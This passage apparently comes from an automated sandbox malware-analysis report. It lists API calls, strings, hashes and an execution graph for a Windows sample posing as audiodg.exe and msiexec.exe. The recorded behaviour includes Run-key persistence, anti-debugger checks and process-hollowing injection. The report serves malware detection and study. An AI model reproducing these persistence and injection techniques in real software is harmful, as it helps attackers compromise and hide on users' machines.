                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EC843744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetVolumeInformationW.KERNEL32 ref: 00007FF6EC8437C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: wsprintfW.USER32 ref: 00007FF6EC843862
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC84392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF6EC843A79
                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF6EC843A84
                                                                                                                                                                                                                        • CopyFileW.KERNEL32 ref: 00007FF6EC843A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF6EC843AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: d0ab19dc095c2e2ee652391215f25f4d87bae92af8b6a6eb246cd33093bec386
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A112136528B4086DB908B14F54476B7BA4FB847A0F105235F9AE83BE8DF7DD146CB04
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
• Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetThreadId$kernel32
• API String ID: 1646373207-2383230424
• Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
• Instruction ID: d8a8707037e08fb5cf08d690587cc28aa04cb35a63961b93133711a4397e9681
• Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
• Instruction Fuzzy Hash: 41E01236918A83C2D624DB10F94832E67A4FB84745F900132E58E82A64EF3DD54ACB09
APIs
  • Part of subcall function 00007FF6EC843884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438CD
  • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438E2
  • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438F5
  • Part of subcall function 00007FF6EC843884: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843905
  • Part of subcall function 00007FF6EC843884: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843918
  • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC84392D
  • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843940
  • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843955
  • Part of subcall function 00007FF6EC844524: CreateFileW.KERNEL32 ref: 00007FF6EC84456B
  • Part of subcall function 00007FF6EC8410D8: OpenProcess.KERNEL32 ref: 00007FF6EC8410FC
• GetProcessHeap.KERNEL32 ref: 00007FF6EC842FC7
• HeapFree.KERNEL32 ref: 00007FF6EC842FDA
Strings
Memory Dump Source
• Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
• Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
Similarity
• API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
• String ID: .x64$chFrWWdQWsLFevUr
• API String ID: 1115570603-2286007224
• Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
• Instruction ID: 6c0365e93915bac776bb99cc403a5b5f0a33cec03175acaffb630966fa009e83
• Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
• Instruction Fuzzy Hash: 0011EC32A18B8285E750EB10FA493AB7BA8FB84744F400535D54CC2665DF3EE446CB4A

Execution Graph

Execution Coverage: 23.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 475
Total number of Limit Nodes: 4
1348->1349 1350 7ff6345c32f2 1348->1350 1351 7ff6345c401e wcscmp 1349->1351 1352 7ff6345c4059 CloseHandle 1349->1352 1350->1327 1353 7ff6345c4035 1351->1353 1354 7ff6345c4042 Process32NextW 1351->1354 1352->1350 1353->1352 1354->1351 1354->1352 1356 7ff6345c13ff 1355->1356 1356->1330 1358 7ff6345c12ea 1357->1358 1358->1338 1358->1339 1360 7ff6345c433d 1359->1360 1361 7ff6345c436b GetLastError 1360->1361 1362 7ff6345c434a 1360->1362 1364 7ff6345c322f CreateThread Sleep CreateThread 1361->1364 1366 7ff6345c4244 GetFileSize 1362->1366 1364->886 1371 7ff6345c3b14 VirtualAlloc 1366->1371 1368 7ff6345c4270 1369 7ff6345c42ba CloseHandle 1368->1369 1370 7ff6345c4284 SetFilePointer ReadFile 1368->1370 1369->1364 1370->1369 1371->1368 1372 7ff6345c2e9c CreateMutexA 1373 7ff6345c2ec1 ReleaseMutex CloseHandle 1372->1373 1374 7ff6345c2ede GetLastError 1372->1374 1375 7ff6345c2f20 1373->1375 1376 7ff6345c2f08 ReleaseMutex CloseHandle 1374->1376 1377 7ff6345c2eeb ReleaseMutex CloseHandle 1374->1377 1376->1375 1377->1375 1378 7ff6345c2f2c 1379 7ff6345c3884 10 API calls 1378->1379 1380 7ff6345c2f6b 1379->1380 1381 7ff6345c4524 16 API calls 1380->1381 1382 7ff6345c2f8f 1381->1382 1383 7ff6345c4084 5 API calls 1382->1383 1384 7ff6345c2fb2 1383->1384 1385 7ff6345c10d8 10 API calls 1384->1385 1386 7ff6345c2fc7 GetProcessHeap HeapFree 1385->1386 1387 7ff6345c337c 1390 7ff6345c24cc GetModuleFileNameW 1387->1390 1391 7ff6345c254d 1390->1391 1398 7ff6345c2548 1390->1398 1392 7ff6345c25a1 1391->1392 1393 7ff6345c258b 1391->1393 1433 7ff6345c240c ExpandEnvironmentStringsW 1392->1433 1394 7ff6345c25bf 1393->1394 1395 7ff6345c2595 1393->1395 1434 7ff6345c244c ExpandEnvironmentStringsW 1394->1434 1395->1398 1435 7ff6345c248c ExpandEnvironmentStringsW 1395->1435 1399 7ff6345c25b6 1399->1398 1401 7ff6345c2611 CreateProcessW 1399->1401 1401->1398 1402 7ff6345c266c 1401->1402 1402->1398 1403 7ff6345c26b3 GetFileSize 1402->1403 1404 7ff6345c26d1 1403->1404 1405 7ff6345c26db CloseHandle 1403->1405 
1404->1405 1406 7ff6345c26eb VirtualAlloc 1404->1406 1405->1398 1407 7ff6345c2725 ReadFile 1406->1407 1408 7ff6345c2715 CloseHandle 1406->1408 1409 7ff6345c2775 CloseHandle GetThreadContext 1407->1409 1410 7ff6345c2752 VirtualFree CloseHandle 1407->1410 1408->1398 1411 7ff6345c27c5 VirtualFree 1409->1411 1412 7ff6345c27dd ReadProcessMemory GetModuleHandleA GetProcAddress 1409->1412 1410->1398 1411->1398 1413 7ff6345c2860 1412->1413 1414 7ff6345c2864 VirtualFree 1413->1414 1415 7ff6345c287c VirtualAllocEx 1413->1415 1414->1398 1416 7ff6345c28ff WriteProcessMemory 1415->1416 1417 7ff6345c28e7 VirtualFree 1415->1417 1418 7ff6345c2935 VirtualFree 1416->1418 1422 7ff6345c294d 1416->1422 1417->1398 1418->1398 1419 7ff6345c2983 WriteProcessMemory 1421 7ff6345c2a0e VirtualFree 1419->1421 1419->1422 1420 7ff6345c2a2b 1423 7ff6345c2a9d RtlCompareMemory 1420->1423 1424 7ff6345c2d1c WriteProcessMemory SetThreadContext 1420->1424 1421->1398 1422->1419 1422->1420 1423->1420 1430 7ff6345c2af0 1423->1430 1425 7ff6345c2da2 VirtualFree 1424->1425 1426 7ff6345c2db7 ResumeThread 1424->1426 1425->1398 1427 7ff6345c2dde VirtualFree 1426->1427 1428 7ff6345c2dc9 VirtualFree 1426->1428 1427->1398 1428->1398 1429 7ff6345c2d17 1429->1424 1430->1429 1431 7ff6345c2c20 ReadProcessMemory WriteProcessMemory 1430->1431 1431->1430 1432 7ff6345c2cf5 VirtualFree 1431->1432 1432->1398 1433->1399 1434->1399 1435->1399 1436 7ff6345c317c 1437 7ff6345c3185 1436->1437 1438 7ff6345c319e 1437->1438 1441 7ff6345c2ffc 1437->1441 1446 7ff6345c2dfc CreateMutexA 1441->1446 1444 7ff6345c3017 Sleep CreateThread WaitForSingleObject 1445 7ff6345c305c Sleep 1444->1445 1445->1437 1447 7ff6345c2e45 GetLastError 1446->1447 1448 7ff6345c2e28 ReleaseMutex CloseHandle 1446->1448 1449 7ff6345c2e6f ReleaseMutex CloseHandle 1447->1449 1450 7ff6345c2e52 ReleaseMutex CloseHandle 1447->1450 1451 7ff6345c2e87 1448->1451 1449->1451 1450->1451 1451->1444 1451->1445 1474 7ff6345c306c 1479 7ff6345c3075 1474->1479 1475 7ff6345c3161 
1477 7ff6345c3be4 RegDeleteKeyW 1477->1479 1478 7ff6345c3de4 9 API calls 1478->1479 1479->1475 1479->1477 1479->1478 1480 7ff6345c3151 Sleep 1479->1480 1481 7ff6345c4404 1479->1481 1480->1479 1482 7ff6345c4452 1481->1482 1483 7ff6345c449a 1482->1483 1487 7ff6345c4384 SetFilePointer WriteFile SetEndOfFile 1482->1487 1483->1479 1485 7ff6345c447b CloseHandle 1485->1483 1487->1485 1488 7ff6345c333c 1489 7ff6345c24cc 35 API calls 1488->1489 1490 7ff6345c334c 1489->1490

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: ExitProcess$DebuggerPresent
• String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
• API String ID: 613740775-1953711635
• Opcode ID: 3b3baf5108ba4d6c55c5e6195d542c51ff070c541550624ec8c12d19a85c9b75
• Instruction ID: bea52b7f392638b7029a2faf43c1bd6b90ff67db4c2600eeba34f16ef956517b
• Opcode Fuzzy Hash: 3b3baf5108ba4d6c55c5e6195d542c51ff070c541550624ec8c12d19a85c9b75
• Instruction Fuzzy Hash: B1611C31E18A5785FBA4AB31E8D937AA2A0BF95721F400035D44EC67E5DE3DED09E740

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: Token$InformationProcess$CloseCurrentHandleOpen
• String ID:
• API String ID: 434396405-0
• Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
• Instruction ID: f8f06d7332d2cd3c7cd09d45edadc0ec34b01fab07090b076a6d0cb3d522b8fd
• Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
• Instruction Fuzzy Hash: 03311632E18A8186E750CB15E89072AF7A0FBD57A1F101036FA8EC3B68DF7CD8419B00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: DebuggerPresent$CheckCurrentProcessRemote
• String ID:
• API String ID: 3920101602-0
• Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
• Instruction ID: 9f96a70d51e68ef5a4a6ac1ad8d13b2d8639f8f6deffb1d443e58f6487f72e0f
• Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
• Instruction Fuzzy Hash: BEF08224D0C28689F7305B25A8C4339A7A0BB59B19F042175D58DC6394CF6CDD09EB11

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: CloseCreateErrorHandleLastMutex
• String ID:
• API String ID: 4294037311-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 328 7ff6345c14ec-7ff6345c1528 LoadLibraryA GetProcAddress
APIs
• LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6345C15F1,?,?,?,?,?,?,?,?,00007FF6345C3418), ref: 00007FF6345C14FF
• GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6345C15F1,?,?,?,?,?,?,?,?,00007FF6345C3418), ref: 00007FF6345C1514
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID:
• API String ID: 2574300362-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 329 7ff6345c3ae4-7ff6345c3af3 330 7ff6345c3af5-7ff6345c3b02 VirtualFree 329->330 331 7ff6345c3b08-7ff6345c3b0c 329->331 330->331
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
• Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0

Control-flow Graph

• Executed
• Not Executed
